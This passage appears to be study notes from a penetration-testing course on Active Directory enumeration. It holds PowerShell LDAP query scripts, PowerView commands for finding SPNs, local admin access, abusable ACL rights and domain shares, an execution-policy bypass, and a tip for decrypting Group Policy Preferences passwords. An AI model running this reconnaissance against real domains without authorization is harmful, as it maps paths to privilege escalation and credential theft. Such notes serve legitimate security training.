$LDAP = "LDAP://$PDC/$DN"
$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)
$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$dirsearcher.FindAll()
This still generates a lot of output; we want to cut it down further. When enumerating AD, we are interested in the attributes of each object which are stored in the Properties field.
This script iterates through each object in the returned search result and prints out each property on its own line.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"
$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)
$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
$result = $dirsearcher.FindAll()
Foreach($obj in $result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
Write-Host "-------------------------------"
}
This still produces a lot of output. We can filter based on any property. For example, we can filter based on the name property for jeffadmin.
We can create a function to help us search AD from the command line:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
function LDAPSearch {
param (
[string]$LDAPQuery
)
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DistinguishedName = ([adsi]'').distinguishedName
$DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)
return $DirectorySearcher.FindAll()
}
By using the Import-Module
in powershell, we can import that function into the context of the powershell prompt.
Import-Module .\function.ps1
Now we can search for specific samAccountType
s
> LDAPSearch -LDAPQuery "(samAccountType=805306368)"
We can also search directly for an Object Class, which is a component of AD that defines the object type. Let’s use objectClass=group in this case to list all the groups in the domain:
LDAPSearch -LDAPQuery "(objectclass=group)"
Our script enumerates more groups than net.exe including Print Operators, IIS_IUSRS, and others. This is because it enumerates all AD objects including Domain Local groups (not just global groups).
In order to print properties and attributes for objects, we’ll need to implement the loops we discussed earlier. For now, let’s do this directly from the PowerShell command.
To enumerate every group available in the domain and also display the user members, we can pipe the output into a new variable and use a foreach loop that will print each property for a group. This allows us to select specific attributes we are interested in. For example, let’s focus on the CN and member attributes:
1
2
3
foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) {
>> $group.properties | select {$_.cn}, {$_.member}
>> }
net.exe
only lists user objects, not group objects. Additionally, net.exe can not display specific attributes. Both these are reasons why custom scripts are useful.
$sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))"
$sales.properties.member
$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))"
$group.properties.member
AD Enumeration with PowerView
See PowerView docs for a list of available commands.
To use PowerView:
- Run
powershell -ep bypass
Import-Module
\path\to\PowerView.ps1`
Manual Enumeration - Expanding Our Repertoire
Enumerating Operating Systems
Get-NetComputer | select operatingsystem
Find-LocalAdminAccess command scans the network in an attempt to determine if our current user has administrative permissions on any computers in the domain.
PsLoggedOn can show you who is logged on, but it relies on the Remote Registry service which has not been enabled by default since Windows 8. The only arg you need to provide PsLoggedOn is the name of the machine you want to check. You can get this name via the command Get-NetComputer | select cn
.
Find out if the current user has local admin privileges on any computers in the domain: Find-LocalAdminAccess
Enumeration Through Service Principal Names
We’ve been focusing on users and groups and machines - Service Accounts should also be considered; they may be members of high-privileged groups.
Applications must be executed in the context of an operating system user because the user account defines the context in which it is run. But if the service is launched by the system itself (and not directly by a user) then it is run in the context of a Service Account.
Pre-defined Service Accounts include LocalSystem, LocalService, and NetworkService.
When applications like Exchange, MS SQL, or Internet Information Services (IIS) are integrated into AD, a unique service instance identifier known as Service Principal Name (SPN) associates a service to a specific service account in Active Directory.
To get the IP address and port number of applications running on servers integrated with AD we can simply enumerate all SPNs in the domain. Therefore, we don’t need to run a broad port scan.
Both setspn.exe (which is by default installed on Windows) and Get-NetUser
from PowerView have the ability to enumerate SPNs in a domain.
1
2
# "-L" is used for both servers and users.
setspn -L iis_service
Get-NetUser -SPN | select samaccountname,serviceprincipalname
The Get-NetUser
command returns a domain name such as web04.corp.com
; you can get the IP address for it by using nslookup.exe
:
nslookup.exe web04.corp.com
Enumerating Object Permissions
AD objects may have permissions applied to them with multiple Access Control Entries (ACE). ACEs make up the Access Control List (ACL).
ACLs are consulted when an object tries to access something that needs permissions. For example, when a user tries to access a domain share (also an object), the user will send an access token that consists of the user identity and permissions. This token is validated against lsit of entries in the ACL.
This can get complicated; as an attacker, we are mainly interested in a few key permission types. These are the most interesting ones:
1
2
3
4
5
6
7
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group
Enumerate ACEs with PowerView:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
PS C:\Tools> Get-ObjectAcl -Identity stephanie
...
ObjectDN : CN=stephanie,CN=Users,DC=corp,DC=com
ObjectSID : S-1-5-21-1987370270-658905905-1781884369-1104
ActiveDirectoryRights : ReadProperty
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 4c164200-20c0-11d0-a768-00aa006e0529
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 16
SecurityIdentifier : S-1-5-21-1987370270-658905905-1781884369-553
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
...
This produces lot of output; it’s most important to pay attention to the seven ACEs listed in the list above.
Use PowerView to convert a SID to a name:
1
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
1
Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
Enumerating Domain Shares
Playbook:
- Enumerate domain shares (using Find-DomainShare function from PowerView)
import-module powerview.ps1
find-domainshare [-CheckShareAccess]
Domain shares can contain useful info about the environment.
PowerView has the Find-DomainShare function to find shares in the domain. Using the -CheckShareAccess
flag causes shares to be displayed only if we have access to them.
- See if you can find SYSVOL because it resides on each domain controller and probably holds domain policies and scripts. SYSVOL by default is mapped to
%SystemRoot%\SYSVOL\Sysvol\domain-name
- Investigate every folder you discover to look for interesting items.
- If you find an encrypted password in a folder, if it’s was stored through Group Policy Preferences then you can decrypt it using gpp-decrypt in kali.
- Investigate every folder you discover to look for interesting items.
Active Directory - Automated Enumeration
Collecting Data with SharpHound
- Download the most recent SharpHound release zipfile